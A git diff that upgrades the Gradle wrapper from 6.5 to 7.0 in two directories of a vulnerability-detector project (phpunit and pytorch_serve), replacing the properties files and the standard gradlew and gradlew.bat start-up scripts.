diff --git a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/phpunit/gradlew b/google/detectors/exposedui/phpunit/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/phpunit/gradlew +++ b/google/detectors/exposedui/phpunit/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/phpunit/gradlew.bat b/google/detectors/exposedui/phpunit/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/phpunit/gradlew.bat +++ b/google/detectors/exposedui/phpunit/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/pytorch_serve/gradlew b/google/detectors/exposedui/pytorch_serve/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/pytorch_serve/gradlew +++ b/google/detectors/exposedui/pytorch_serve/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/pytorch_serve/gradlew.bat b/google/detectors/exposedui/pytorch_serve/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/pytorch_serve/gradlew.bat +++ b/google/detectors/exposedui/pytorch_serve/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git 